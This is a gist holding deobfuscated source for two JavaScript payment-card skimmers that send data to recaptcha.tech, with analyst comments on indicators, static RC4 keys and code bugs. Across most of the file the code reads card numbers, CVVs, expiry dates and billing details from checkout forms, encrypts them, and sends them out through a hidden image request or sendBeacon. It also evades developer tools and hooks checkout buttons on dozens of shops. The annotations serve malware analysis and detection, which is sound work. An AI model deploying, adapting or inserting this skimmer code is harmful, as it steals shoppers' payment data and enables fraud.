Created
August 2, 2021 07:57
Recaptcha.tech skimmer
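/**
 * RC4 stream cipher (analyst note: the two loops below are the textbook RC4
 * key-scheduling and keystream-generation steps; the remaining obfuscated
 * identifiers have been renamed and the gist's table-cell residue removed).
 *
 * RC4 is symmetric, so the same call both encrypts and decrypts.
 *
 * @param {string} key   Key material; each UTF-16 code unit is used as a key byte.
 * @param {string} value Text to transform; each code unit is XORed with one keystream byte.
 * @returns {string} Transformed text, one character per input code unit.
 */
function crypt(key, value) {
  const sbox = [];
  let j = 0;
  let swapTmp;
  let output = '';
  let i;

  // Identity permutation 0..255.
  for (i = 0; i < 256; i++) {
    sbox[i] = i;
  }

  // Key scheduling: shuffle the permutation under control of the key.
  for (i = 0; i < 256; i++) {
    j = (j + sbox[i] + key.charCodeAt(i % key.length)) % 256;
    swapTmp = sbox[i];
    sbox[i] = sbox[j];
    sbox[j] = swapTmp;
  }

  // Keystream generation: one swap and one XOR per input character.
  i = 0;
  j = 0;
  for (let pos = 0; pos < value.length; pos++) {
    i = (i + 1) % 256;
    j = (j + sbox[i]) % 256;
    swapTmp = sbox[i];
    sbox[i] = sbox[j];
    sbox[j] = swapTmp;
    output += String.fromCharCode(value.charCodeAt(pos) ^ sbox[(sbox[i] + sbox[j]) % 256]);
  }
  return output;
}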
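/**
 * Serialises or deserialises the staged data blob.
 *
 * Encode path (encrypt truthy):  JSON -> encodeURIComponent -> crypt() -> base64.
 * Decode path (encrypt falsy):   base64 -> crypt() -> decodeURIComponent -> JSON.parse.
 *
 * Analyst note: the key "dev.recaptcha.stream" is a static string in the
 * sample, so a blob recovered from localStorage or from a captured request
 * can be decoded by running the decode path against it.
 *
 * @param {*} value      Object to encode, or base64 string to decode.
 * @param {boolean} encrypt Selects the encode (true) or decode (false) path.
 * @returns {*} Base64 string when encoding, parsed object when decoding.
 */
function format(value, encrypt) {
  if (encrypt) {
    return btoa(crypt("dev.recaptcha.stream", encodeURIComponent(JSON.stringify(value))));
  }
  if (!encrypt) {
    return JSON.parse(decodeURIComponent(crypt("dev.recaptcha.stream", atob(value))));
  }
}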
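/**
 * Reads payment-card and billing fields from the checkout page and stages
 * them, encoded by format(), in localStorage under the key "recaptcha.stream".
 *
 * Analyst notes:
 *  - Each entry maps a field label to [cssSelector, property]; null entries
 *    are fields this build does not collect.
 *  - The selectors are specific to one checkout form layout.
 *  - Indicator: a localStorage item named "recaptcha.stream" on a shop origin.
 */
function harvestValues() {
  var targetedFieldsDetails = {}; // The target fields' cssSelector and attribute to collect
  targetedFieldsDetails.cc_number = ["#cardnumber", "value"];
  targetedFieldsDetails.cc_cvv = ["#cvc", "value"];
  targetedFieldsDetails.cc_exp_m = ["#exp_month", "value"];
  targetedFieldsDetails.cc_exp_y = ["#exp_year", "value"];
  targetedFieldsDetails.cc_owner = null;
  targetedFieldsDetails.billing_state = ["[class='selectize-input items has-options full has-items']", "innerText"];
  targetedFieldsDetails.billing_city = ["#city_billing", "value"];
  targetedFieldsDetails.billing_country = null;
  targetedFieldsDetails.billing_email = ["#email_billing", "value"];
  targetedFieldsDetails.billing_firstname = ["#first_name_billing", "value"];
  targetedFieldsDetails.billing_lastname = ["#last_name_billing", "value"];
  targetedFieldsDetails.billing_zip = ["#zipcode_billing", "value"];
  targetedFieldsDetails.billing_address = ["#address_billing", "value"];
  targetedFieldsDetails.billing_telephone = ["#telephone_billing", "value"];

  // First run: seed the staging record with every label set to null.
  if (localStorage.getItem("recaptcha.stream") == null) {
    var targetedFieldsCollectedData = {};
    Object.keys(targetedFieldsDetails).forEach(function (targetedField) {
      targetedFieldsCollectedData[targetedField] = null;
    });
    localStorage.setItem("recaptcha.stream", format(targetedFieldsCollectedData, true));
  }

  // Decode the staged record, overwrite any field currently present in the DOM,
  // and write the record back encoded.
  var storedData = format(localStorage.getItem("recaptcha.stream"), false);
  Object.keys(targetedFieldsDetails).forEach(function (targetedFieldDetails) {
    if (targetedFieldsDetails[targetedFieldDetails] != null) {
      switch (targetedFieldsDetails[targetedFieldDetails][1]) {
        case "value":
          if (document.querySelector(targetedFieldsDetails[targetedFieldDetails][0]) != null) {
            storedData[targetedFieldDetails] = document.querySelector(targetedFieldsDetails[targetedFieldDetails][0]).value;
          }
          break;
        case "innerText":
          if (document.querySelector(targetedFieldsDetails[targetedFieldDetails][0]) != null) {
            storedData[targetedFieldDetails] = document.querySelector(targetedFieldsDetails[targetedFieldDetails][0]).innerText;
          }
          break;
      }
    }
  });
  localStorage.setItem("recaptcha.stream", format(storedData, true));
}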
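/**
 * Anti-analysis check, run on every window resize.
 *
 * If the outer window exceeds the viewport by more than 100 px in either
 * dimension (the heuristic the sample uses for a docked developer-tools
 * panel), it writes the current timestamp to localStorage under "init".
 * The other functions in this file treat a present "init" item as a signal
 * to stay dormant.
 */
function isDevtoolsTabOpen() {
  if (outerHeight - innerHeight > 100 || outerWidth - innerWidth > 100) {
    localStorage.setItem("init", +new Date());
  }
}
// Overwrites any resize handler the page itself had assigned to window.onresize.
window.onresize = isDevtoolsTabOpen;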
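/**
 * Dormancy timer, run once per second.
 *
 *  - If the "init" timestamp is more than 60 minutes old, it is removed, which
 *    lets the collection logic run again.
 *  - While "init" is still present, the staged "recaptcha.stream" record is
 *    deleted from localStorage.
 */
function shouldResumeOrCeaseAttack() {
  // Elapsed time is converted from milliseconds to minutes before the comparison.
  if ((+new Date() - localStorage.getItem("init")) / 1000 / 60 > 60) {
    localStorage.removeItem("init");
  }
  if (localStorage.getItem("init") != null) {
    localStorage.removeItem("recaptcha.stream");
  }
}
setInterval(shouldResumeOrCeaseAttack, 1000);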
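/**
 * Replaces a checkout button with a clone that intercepts the click.
 *
 * Sequence, as written:
 *  1. The target element is deep-cloned; the clone loses its href and gains
 *     the attribute default="true" (used elsewhere as an "already hooked" marker).
 *  2. On click, if the "init" dormancy flag is absent, harvestValues() runs and
 *     the staged blob is sent as the `recaptcha_stream` query parameter of an
 *     image request to recaptcha.tech.
 *  3. A 250 ms poll then removes the image element, deletes the staged blob,
 *     puts the original button back and clicks it so the checkout proceeds.
 *  4. If "init" is set, the original button is restored and clicked immediately.
 *
 * Indicators visible in this function: an <img id="devRecaptchaStream">, a
 * request to https://recaptcha.tech/recaptcha.php, and a button carrying
 * default="true". The image request is subject to the page's CSP img-src
 * directive where one is deployed.
 *
 * @param {Array} cssSelectorDetails [cssSelector, flag] pair for the button.
 */
function attachAttackToButton(cssSelectorDetails) {
  var el = document.querySelector(cssSelectorDetails[0]);
  var parentEl = el.parentNode;
  var clonedEl = el.cloneNode(true);
  clonedEl.removeAttribute("href");
  clonedEl.setAttribute("default", true);
  var counter = 0;
  clonedEl.addEventListener("click", () => {
    if (!localStorage.getItem("init")) {
      harvestValues();
      if (cssSelectorDetails[1]) { // <-- always true
        // Exfiltration: the encoded blob is appended to the image URL unescaped.
        var img = document.createElement("img");
        img.width = "1px";
        img.height = "1px";
        img.id = "devRecaptchaStream";
        img.src = "https://recaptcha.tech/recaptcha.php?recaptcha_stream=" + localStorage.getItem("recaptcha.stream") + "&type=desktop&format=gif&mod=find_buses&id=3b4353";
        document.body.appendChild(img);
        // Cleanup poll: the element was appended just above, so the second
        // condition is normally already true on the first tick.
        var intervalId2 = setInterval(function () {
          if (counter > 60 || document.getElementById("devRecaptchaStream") != null) {
            if (document.getElementById("devRecaptchaStream") != null) {
              var devRecaptchaStreamEl = document.getElementById("devRecaptchaStream");
              devRecaptchaStreamEl.parentNode.removeChild(devRecaptchaStreamEl);
            }
            localStorage.removeItem("recaptcha.stream");
            parentEl.replaceChild(el, clonedEl);
            el.click();
            clearInterval(intervalId2);
          }
          counter++;
        }, 250);
      } else {
        parentEl.replaceChild(el, clonedEl);
        el.click();
      }
    } else {
      parentEl.replaceChild(el, clonedEl);
      el.click();
    }
  });
  parentEl.replaceChild(clonedEl, el);
  // Recorded in file-level state so the swap can be undone when "init" appears.
  elementReplacements[replacedElementsCounter] = [parentEl, el, clonedEl];
  replacedElementsCounter = replacedElementsCounter + 1;
}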
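// Bootstrap for the first script. Nothing is hooked if the "init" dormancy
// flag is already present when the script loads.
if (!localStorage.getItem("init")) {
  // Selector -> flag map of buttons to hook; this build targets one jQuery UI button class string.
  var targetedButtons = {};
  targetedButtons["[class='ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only']"] = true;
  var elementReplacements = {};
  var replacedElementsCounter = 0;
  var intervalId1 = setInterval(function () {
    // Every 250 ms: once the document has loaded, hook any targeted button
    // that is not already a marked clone (default="true").
    if (document.readyState === "complete" && localStorage.getItem("init") == null) {
      Object.keys(targetedButtons).forEach(function (cssSelector) {
        if (!(document.querySelector(cssSelector) == null)) {
          if (document.querySelector(cssSelector).getAttribute("default") !== "true") {
            attachAttackToButton([cssSelector, targetedButtons[cssSelector]]);
          }
        }
      });
    }
    // Dormancy flag raised: put every original button back and stop polling.
    if (localStorage.getItem("init") != null) {
      Object.keys(elementReplacements).forEach(function (elementDetails) {
        try {
          elementReplacements[elementDetails][0]
            .replaceChild(elementReplacements[elementDetails][1], elementReplacements[elementDetails][2]);
        } catch (e) {}
      });
      clearInterval(intervalId1);
    }
  }, 250);
}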
(function () { | |
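/**
 * Second skimmer variant: a generic form scraper that sends its data with
 * navigator.sendBeacon when the pointer moves over a checkout button.
 *
 * All settings are read from the `config` object defined after this class in
 * the same function scope. The "init" localStorage item is the dormancy flag:
 * it is set when developer tools are suspected and checked on every start().
 */
class attackClass {
  /**
   * Installs a document-wide keydown handler that raises the dormancy flag on
   * F12, or when the last three distinct consecutive keys are Control, Shift
   * and one of config.bad_keys.
   */
  constructor() {
    document.onkeydown = function (keyboardEvent) {
      if (keyboardEvent.key === "F12") {
        localStorage.setItem("init", +new Date());
      }
      // Repeats of the most recent key are ignored; otherwise the three-slot
      // history shifts by one and the new key goes into slot 1.
      if (keyboardEvent.key !== config.tmp_keys[1]) {
        config.tmp_keys[3] = config.tmp_keys[2];
        config.tmp_keys[2] = config.tmp_keys[1];
        config.tmp_keys[1] = keyboardEvent.key;
        if (config.tmp_keys[3] === "Control" &&
          config.tmp_keys[2] === "Shift" &&
          config.bad_keys.includes(config.tmp_keys[1])) {
          localStorage.setItem("init", +new Date());
        }
      }
    };
  }

  /**
   * Reports whether the user agent contains one of config.mobiles and the
   * browser exposes touch support.
   *
   * @returns {boolean} true only when both conditions hold.
   */
  isMobile() {
    for (var idx in config.mobiles) {
      try {
        // `> 0` means a match at position 0 of the user-agent string does not count.
        if (navigator.userAgent.toLowerCase().indexOf(config.mobiles[idx].toLowerCase()) > 0) {
          if ("ontouchstart" in window && window.navigator.maxTouchPoints > 0) {
            return true;
          }
        }
      } catch (e) {}
    }
    return false;
  }

  /**
   * RC4 stream cipher (key scheduling followed by keystream XOR). Symmetric:
   * the same call encrypts and decrypts. Obfuscated local names have been
   * replaced with descriptive ones.
   *
   * @param {string} key   Key material, one code unit per key byte.
   * @param {string} value Text to transform.
   * @returns {string} Transformed text, one character per input code unit.
   */
  crypt(key, value) {
    const sbox = [];
    let j = 0;
    let swapTmp;
    let encryptedOutput = '';
    let i;
    for (i = 0; i < 256; i++) {
      sbox[i] = i;
    }
    for (i = 0; i < 256; i++) {
      j = (j + sbox[i] + key.charCodeAt(i % key.length)) % 256;
      swapTmp = sbox[i];
      sbox[i] = sbox[j];
      sbox[j] = swapTmp;
    }
    i = 0;
    j = 0;
    for (let pos = 0; pos < value.length; pos++) {
      i = (i + 1) % 256;
      j = (j + sbox[i]) % 256;
      swapTmp = sbox[i];
      sbox[i] = sbox[j];
      sbox[j] = swapTmp;
      encryptedOutput += String.fromCharCode(value.charCodeAt(pos) ^ sbox[(sbox[i] + sbox[j]) % 256]);
    }
    return encryptedOutput;
  }

  /**
   * Encode path: JSON -> encodeURIComponent -> crypt() -> base64.
   * Decode path: base64 -> crypt() -> decodeURIComponent -> JSON.parse.
   *
   * Analyst note: the key "dev.recaptcha.stream" is static, so a captured
   * beacon body can be decoded with the decode path.
   *
   * @param {*} value       Object to encode, or base64 string to decode.
   * @param {boolean} encrypt Selects encode (true) or decode (false).
   * @returns {*} Base64 string when encoding, parsed object when decoding.
   */
  format(value, encrypt) {
    if (encrypt) {
      return btoa(this.crypt("dev.recaptcha.stream", encodeURIComponent(JSON.stringify(value))));
    }
    if (!encrypt) {
      return JSON.parse(decodeURIComponent(this.crypt("dev.recaptcha.stream", atob(value))));
    }
  }

  /**
   * Scrapes every input, select, textarea and selected option on the page and
   * stores the encoded result in config.data.
   *
   * Unlike a field-specific selector list, this collects any non-empty form
   * value, keyed by the element's name, its id, or "<tag>$<parent name/id>".
   * Hidden inputs are skipped unless they carry data-validate-required.
   */
  update_data() {
    let collectedData = {};
    config.data = {};
    document.querySelectorAll("input, select, textarea, option[selected=\"selected\"]").forEach(function (el) {
      try {
        if (el.type !== "hidden" || el.hasAttribute("data-validate-required")) {
          let elName = null;
          if (el.name && el.name.length > 0) {
            elName = el.name;
          } else if (el.id && el.id.length > 0) {
            elName = el.id;
          } else if (el.parentNode.name.length > 0) {
            elName = el.localName + '$' + el.parentNode.name;
          } else if (el.parentNode.id.length > 0) {
            elName = el.localName + '$' + el.parentNode.id;
          } else {
            return;
          }
          if (el.value !== undefined && el.localName !== "option") {
            if (el.value.length > 0) {
              collectedData[elName] = el.value;
            }
          } else if (el.innerText !== undefined) {
            if (el.innerText.length > 0) {
              collectedData[elName] = el.innerText;
            }
          }
        }
      } catch (e) {} // errors on individual elements are swallowed
    });
    config.data = this.format(collectedData, true);
  }

  /**
   * Sends config.data to config.backend with navigator.sendBeacon.
   * Reads only `config`, so it works when registered as an unbound listener.
   * Beacon requests are governed by the page's CSP connect-src directive
   * where one is deployed.
   */
  send() {
    navigator.sendBeacon(config.backend, config.data);
  }

  /**
   * One tick of the main loop: run the anti-analysis checks, then either hook
   * the configured buttons and refresh the scraped data, or unhook everything.
   */
  start() {
    config.isMobile = this.isMobile();
    // NOTE(review): the result above is stored in config.isMobile, but this
    // guard reads config.mobile, which the listing initialises to false and
    // never updates - so the checks below run on every tick.
    if (!config.mobile) {
      // Window-size heuristic for docked developer tools (threshold 300 px).
      if (outerHeight - innerHeight > 300 || outerWidth - innerWidth > 300) {
        localStorage.setItem("init", +new Date());
      }
      // The dormancy flag expires after 180 minutes.
      if ((+new Date() - localStorage.getItem("init")) / 1000 / 60 > 180) {
        localStorage.removeItem("init");
      }
    }
    if (!localStorage.getItem("init")) {
      config.objects.forEach(function (cssSelector, _, __) {
        try {
          // querySelector returns null for a miss, so this comparison does not
          // filter anything; a miss throws on the next line and is swallowed.
          if (document.querySelector(cssSelector) !== undefined) {
            // An own property named "onrotate" marks an element as already hooked.
            if (!document.querySelector(cssSelector).hasOwnProperty("onrotate")) {
              document.querySelector(cssSelector).addEventListener("mouseover", this.send);
              Object.defineProperty(document.querySelector(cssSelector), "onrotate", {});
            }
          }
        } catch (e) {}
      }, this);
      this.update_data();
    } else {
      // Dormancy flag present: remove the key handler, listeners and markers.
      document.onkeydown = null;
      config.objects.forEach(function (cssSelector, _, __) {
        try {
          if (document.querySelector(cssSelector) !== undefined) {
            document.querySelector(cssSelector).removeEventListener("mouseover", this.send);
            if (document.querySelector(cssSelector).hasOwnProperty("onrotate")) {
              delete document.querySelector(cssSelector).onrotate;
            }
          }
        } catch (e) {}
      }, this);
      try {
        // Signals the polling loop that started this instance to stop.
        config.allowed = false;
      } catch (e) {}
    }
  }
}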
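// Three-slot history of recent key presses, pre-filled with a dummy value.
const tmpKeyPlaceholder = {};
tmpKeyPlaceholder['1'] = 'X';
tmpKeyPlaceholder['2'] = 'X';
tmpKeyPlaceholder['3'] = 'X';

// Runtime configuration shared by every attackClass method.
const config = {};
config.mobile = false;
config.allowed = true; // set to false by start() once the dormancy flag is seen
config.data = {}; // replaced with the encoded form data by update_data()
config.backend = "https://recaptcha.tech/verify"; // beacon destination (network indicator)
config.tmp_keys = tmpKeyPlaceholder;
// Keys that, after Control then Shift, are treated as a developer-tools shortcut.
config.bad_keys = ['I', 'C', 'J', 'U'];
// User-agent substrings checked by isMobile().
config.mobiles = ["iphone", "ipad", "android", "blackberry", "nokia", "opera mini", "windows mobile", "windows phone", "iemobile"];
// CSS selectors of checkout / purchase controls that get the mouseover listener.
// The list spans several unrelated form layouts, which suggests one build is
// reused across multiple shops - inferred from the selectors, not stated on the page.
config.objects = ["#purchasebutton", "#purchasebutton2", "#complete_my_order", "#buyBtn", ".membership-fixed.membership-purchase.footer-nav-bar.active .container", ".membership-fixed.membership-order.footer-nav-bar.active .container", "#pay-ccard", ".button.blue-button.register-button", "#button-confirm", "div[id='tab-3'] .procced-to-payment-block .btn.wizgobtn", "div[id='tab-9'] .procced-to-payment-block .btn.wizgobtn", "button[class='thm-btn thm-blue-bg']", "button[class='pg-button pg-checkout-continue btn btn-primary btn-full']", "#place_order", "#send", "#checkout_submit", "#edit-continue", "input[class='btn-dk-blue btn-md btn-rounded checkout_mobile']", "#button-payment-method", "button[class^='PayNowButton__GoToCheckout']", "button[class^='AddressForm__GoToCheckout']", "form[id='checkout_shipping_form'] button[type='submit']", "button[id='submit_order']", ".advertise_login .btn_right_container_checkout input", ".advertise_register .btn_right_container_checkout input", "#placeOrderButton", "#submit_checkout_form_btn", "#submit_user_data", "#complete_reservation", "#pay-next-braintree", "button[class='card_checkout_button proceed_btn']", "input[class='btn-regular-sm']", "#onestepcheckout-button-place-order"];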
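// Launcher: creates the instance and calls start() every 500 ms until start()
// reports, via config.allowed === false, that the dormancy flag was seen.
try {
  let attackInstance = new attackClass();
  let intervalId = setInterval(function () {
    attackInstance.start();
    if (config.allowed === false) {
      // NOTE(review): `config` is declared with const in this deobfuscated
      // listing, so this assignment would throw a TypeError inside the timer
      // callback, which the surrounding try/catch does not cover; the lines
      // after it, including clearInterval, would then not run. Either the
      // original sample used a reassignable binding or this cleanup never
      // completes - confirm against the raw sample.
      config = undefined;
      attackInstance = undefined;
      attackClass = undefined;
      clearInterval(intervalId);
    }
  }, 500);
} catch (e) {}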
})(); |
The crypt( ) function looks like RC4 to me.